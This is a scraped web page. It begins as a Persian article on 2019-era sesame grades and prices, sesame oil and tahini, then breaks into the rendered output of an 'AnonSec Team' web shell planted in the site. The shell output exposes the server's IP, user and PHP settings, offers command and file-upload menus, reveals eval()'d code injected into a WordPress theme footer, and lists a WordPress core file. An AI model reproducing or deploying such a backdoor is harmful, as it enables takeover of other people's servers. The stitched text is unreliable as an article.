قیمت انواع کنجد ایرانی و خارجی در سال 98

قیمت انواع کنجد تحت تاثیر سیاست های و برنامه های دولت، میزان کشت و برداشت هر کشور، میزان واردات و صادرات در هر منطقه است. برای مثال کشت کنجد قهوه ای در سالهای اخیر در ایران افزایش داشته است و همین امر موجب شده است واردات آن از افغانستان نسبت به گذشته کاهش چشمگیری داشته باشد.

قیمت انواع کنجد ایرانی و خارجی هر کدام به نسبت میزان مصرف و فروش آن در بازار نوساناتی دارد. در دهه گذشته علاقه جمعی به مصرف روغن های طبیعی استخراج شده به روش پرس سرد، افزایش یافت و این امر موجب افزایش مصرف و به طبع آن بالا رفتن قیمت کنجد گردید.

قیمت انواع کنجد

قیمت انواع کنجد وارداتی و تولید داخلی

در ایران از گذشته کشت کنجد انجام می شده است ولی دانه ای نبوده که کشت انبوه چون گندم و جو داشته باشد. ولی طی 20 سال گذشته کشت آن رو به افزایش داشته، به طوری که در حال حاضر نزدیک به 40 هزار تن رسیده است.

قیمت کنجد مناطق مختلف ایران به ترتیب اولویت زیر تعیین می گردد:

  1. کنجد لارستان فارس
  2. کنجد منطقه مغان اردبیل و کنجد استان گلستان
  3. کنجد دزفول، کهنوج کرمان
  4. کنجد کازرون و …

در کشورهای همسایه شرقی ایران به خصوص افغانستان و پاکستان و سپس هند، کشت کنجد مانند گندم به صورت انبوه انجام می گرفته است. اکنون نیز این سه کشور از بزرگترین صادرکننده گان این محصول به کشورهای آسیای غربی و اروپا هستند. بهترین کنجد کشورها و همچنین قیمت انواع کنجد خارجی با توجه به کیفیت و مرغوبیت به ترتیب زیر است:

  1. کنجد افغانستانی
  2. کنجد پاکستانی
  3. کنجد سودان
  4. کنجد هندی
  5. کنجد ازبکستان و …

*پیش بینی ما این است که در سال 98 قیمت انواع کنجد با اینکه نواساناتی خواهد داشت، مانند سال 97 دچار شک کاهش و افزایش قیمت نباشد. قیمت در رنج مشخصی از 17000 تومان تا 24000 تومان در فصول وفور کنجد و کمبود محصول افت و خیز خواهد کرد.

قیمت انواع کنجد

 

تولید روغن از چه نوع کنجدی سود بیشتری دارد؟

جهت استخراج روغن کنجد و روغن ارده باید دقت شود، کنجدی خریداری گردد که:

  • درصد روغن بیشتری داشته باشد، حداقل47%
  • تلخ نباشد(به دلیل مصرف زیاد کود و سموم کشاورزی کنجد برخی مناطق و کشورها تلخ تر است)
  • پوکی نداشته باشد تا لرد آن زیاد نشود
  • رطوبت بالایی نداشته باشد حداکثر 8%
  • ناخالصی کمتری داشته باشد حداکثر 4%

کنجد لار به دلیل طعم شیرین، داشتن روغن بالای 55% بهترین کنجد ایرانی است. در مرحله برداشت نیز به روش مکانیزه برداشت شده و ناخالصی زیر 3 درصد دارد. همچنین به خوبی خشک می شود و رطوبت کمتری نسبت به مناطق دیگر دارد.

از میان کنجد های وارداتی، کنجد افغانی و پاکستانی درصد روغن بالای 50 دارند، رطوبت زیر 7 درصد و ناخالصی افغانی حداکثر 4% و پاکستانی زیر 2.5 درصد است. طعم کنجد افغانی شیرین تر است اما به دلیل رنگ تیره تر و طعم تندش نسبت به پاکستانی کمتر مورد استقبال قرار می گیرد.

* در نتیجه برای تولید روغن استفاده از کنجد های افغانی، پاکستانی و از نمونه های ایرانی  کنجد لارستان فارس، دزفول، مغان و کنجد استان گلستان ایرانی مقرون به صرفه تر است.

قیمت انواع کنجد

قیمت روغن کنجد و ارده در سال 98

قیمت روغن کنجد، مستقیما از قیمت کنجد متاثر است پس باید منتظر قیمت کنجد در بازارهای جهانی و در بازار ایران بوده و براساس آن روغن کنجد تولید شده را قیمت گذاری نماییم. برخلاف کنجد، کیفیت کنجد تولید شده تاثیر چندانی ندارد. یعنی اینطور نیست که روغن کنجد افغانی یا لارستان از دیگر روغن کنجدها گرانتر به فروش برسد. بلکه روغن ها با توجه به ویژه گی های زیر قیمت های بالاتری خواهند داشت:

  • روغن مانده و کهنه نباشد. (از طعم روغن مشخص می شود و یا تلخ تر می گردد).
  • لرد نداشته باشد، یا لرد کمتری داشته باشد.
  • طعم روغن تلخ نباشد و کاملا طعم کنجد در آن مشخص باشد.
  • رنگ طبیعی داشته باشد(نه بیش از حد به سبزی و نه به زردی بزند).
  • ناخالصی نداشته باشد(روغن دیگری به آن افزده نشده باشد که این موضوع فقط در آنالیز مشخص شده و با چشیدن مشخص نمی گردد).
ÿØÿà JFIF ÿþ; AnonSec Team
AnonSec Team
Server IP : 37.187.155.34  /  Your IP : 18.221.153.229
Web Server : LiteSpeed
System : Linux ps4.arad360.com 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : oilse103 ( 1565)
PHP Version : 7.4.33
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/oilse103/:/tmp:/var/tmp:/opt/alt/php74/usr/share/pear/:/dev/urandom:/usr/local/lib/php/:/usr/local/php74/lib/php/) in /home/oilse103/domains/oilseeda.ir/public_html/wp-content/themes/hello-elementor/footer.php(1) : eval()'d code on line 329
OFF  |  Perl :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/oilse103/:/tmp:/var/tmp:/opt/alt/php74/usr/share/pear/:/dev/urandom:/usr/local/lib/php/:/usr/local/php74/lib/php/) in /home/oilse103/domains/oilseeda.ir/public_html/wp-content/themes/hello-elementor/footer.php(1) : eval()'d code on line 335
OFF  |  Python :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/oilse103/:/tmp:/var/tmp:/opt/alt/php74/usr/share/pear/:/dev/urandom:/usr/local/lib/php/:/usr/local/php74/lib/php/) in /home/oilse103/domains/oilseeda.ir/public_html/wp-content/themes/hello-elementor/footer.php(1) : eval()'d code on line 341
OFF
Directory (0755) :  /home/oilse103/domains/oilseeda.ir/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/oilse103/domains/oilseeda.ir/public_html/wp-trackback.php
<?php
/**
 * Handle Trackbacks and Pingbacks Sent to WordPress
 *
 * @since 0.71
 *
 * @package WordPress
 * @subpackage Trackbacks
 */

if ( empty( $wp ) ) {
	require_once __DIR__ . '/wp-load.php';
	wp( array( 'tb' => '1' ) );
}

// Always run as an unauthenticated user.
wp_set_current_user( 0 );

/**
 * Response to a trackback.
 *
 * Responds with an error or success XML message.
 *
 * @since 0.71
 *
 * @param int|bool $error         Whether there was an error.
 *                                Default '0'. Accepts '0' or '1', true or false.
 * @param string   $error_message Error message if an error occurred. Default empty string.
 */
function trackback_response( $error = 0, $error_message = '' ) {
	header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ) );

	if ( $error ) {
		echo '<?xml version="1.0" encoding="utf-8"?' . ">\n";
		echo "<response>\n";
		echo "<error>1</error>\n";
		echo "<message>$error_message</message>\n";
		echo '</response>';
		die();
	} else {
		echo '<?xml version="1.0" encoding="utf-8"?' . ">\n";
		echo "<response>\n";
		echo "<error>0</error>\n";
		echo '</response>';
	}
}

if ( ! isset( $_GET['tb_id'] ) || ! $_GET['tb_id'] ) {
	$post_id = explode( '/', $_SERVER['REQUEST_URI'] );
	$post_id = (int) $post_id[ count( $post_id ) - 1 ];
}

$trackback_url = isset( $_POST['url'] ) ? $_POST['url'] : '';
$charset       = isset( $_POST['charset'] ) ? $_POST['charset'] : '';

// These three are stripslashed here so they can be properly escaped after mb_convert_encoding().
$title     = isset( $_POST['title'] ) ? wp_unslash( $_POST['title'] ) : '';
$excerpt   = isset( $_POST['excerpt'] ) ? wp_unslash( $_POST['excerpt'] ) : '';
$blog_name = isset( $_POST['blog_name'] ) ? wp_unslash( $_POST['blog_name'] ) : '';

if ( $charset ) {
	$charset = str_replace( array( ',', ' ' ), '', strtoupper( trim( $charset ) ) );
} else {
	$charset = 'ASCII, UTF-8, ISO-8859-1, JIS, EUC-JP, SJIS';
}

// No valid uses for UTF-7.
if ( str_contains( $charset, 'UTF-7' ) ) {
	die;
}

// For international trackbacks.
if ( function_exists( 'mb_convert_encoding' ) ) {
	$title     = mb_convert_encoding( $title, get_option( 'blog_charset' ), $charset );
	$excerpt   = mb_convert_encoding( $excerpt, get_option( 'blog_charset' ), $charset );
	$blog_name = mb_convert_encoding( $blog_name, get_option( 'blog_charset' ), $charset );
}

// Escape values to use in the trackback.
$title     = wp_slash( $title );
$excerpt   = wp_slash( $excerpt );
$blog_name = wp_slash( $blog_name );

if ( is_single() || is_page() ) {
	$post_id = $posts[0]->ID;
}

if ( ! isset( $post_id ) || ! (int) $post_id ) {
	trackback_response( 1, __( 'I really need an ID for this to work.' ) );
}

if ( empty( $title ) && empty( $trackback_url ) && empty( $blog_name ) ) {
	// If it doesn't look like a trackback at all.
	wp_redirect( get_permalink( $post_id ) );
	exit;
}

if ( ! empty( $trackback_url ) && ! empty( $title ) ) {
	/**
	 * Fires before the trackback is added to a post.
	 *
	 * @since 4.7.0
	 *
	 * @param int    $post_id       Post ID related to the trackback.
	 * @param string $trackback_url Trackback URL.
	 * @param string $charset       Character set.
	 * @param string $title         Trackback title.
	 * @param string $excerpt       Trackback excerpt.
	 * @param string $blog_name     Site name.
	 */
	do_action( 'pre_trackback_post', $post_id, $trackback_url, $charset, $title, $excerpt, $blog_name );

	header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ) );

	if ( ! pings_open( $post_id ) ) {
		trackback_response( 1, __( 'Sorry, trackbacks are closed for this item.' ) );
	}

	$title   = wp_html_excerpt( $title, 250, '&#8230;' );
	$excerpt = wp_html_excerpt( $excerpt, 252, '&#8230;' );

	$comment_post_id      = (int) $post_id;
	$comment_author       = $blog_name;
	$comment_author_email = '';
	$comment_author_url   = $trackback_url;
	$comment_content      = "<strong>$title</strong>\n\n$excerpt";
	$comment_type         = 'trackback';

	$dupe = $wpdb->get_results(
		$wpdb->prepare(
			"SELECT * FROM $wpdb->comments WHERE comment_post_ID = %d AND comment_author_url = %s",
			$comment_post_id,
			$comment_author_url
		)
	);

	if ( $dupe ) {
		trackback_response( 1, __( 'There is already a ping from that URL for this post.' ) );
	}

	$commentdata = array(
		'comment_post_ID' => $comment_post_id,
	);

	$commentdata += compact(
		'comment_author',
		'comment_author_email',
		'comment_author_url',
		'comment_content',
		'comment_type'
	);

	$result = wp_new_comment( $commentdata );

	if ( is_wp_error( $result ) ) {
		trackback_response( 1, $result->get_error_message() );
	}

	$trackback_id = $wpdb->insert_id;

	/**
	 * Fires after a trackback is added to a post.
	 *
	 * @since 1.2.0
	 *
	 * @param int $trackback_id Trackback ID.
	 */
	do_action( 'trackback_post', $trackback_id );

	trackback_response( 0 );
}

AnonSec - 2021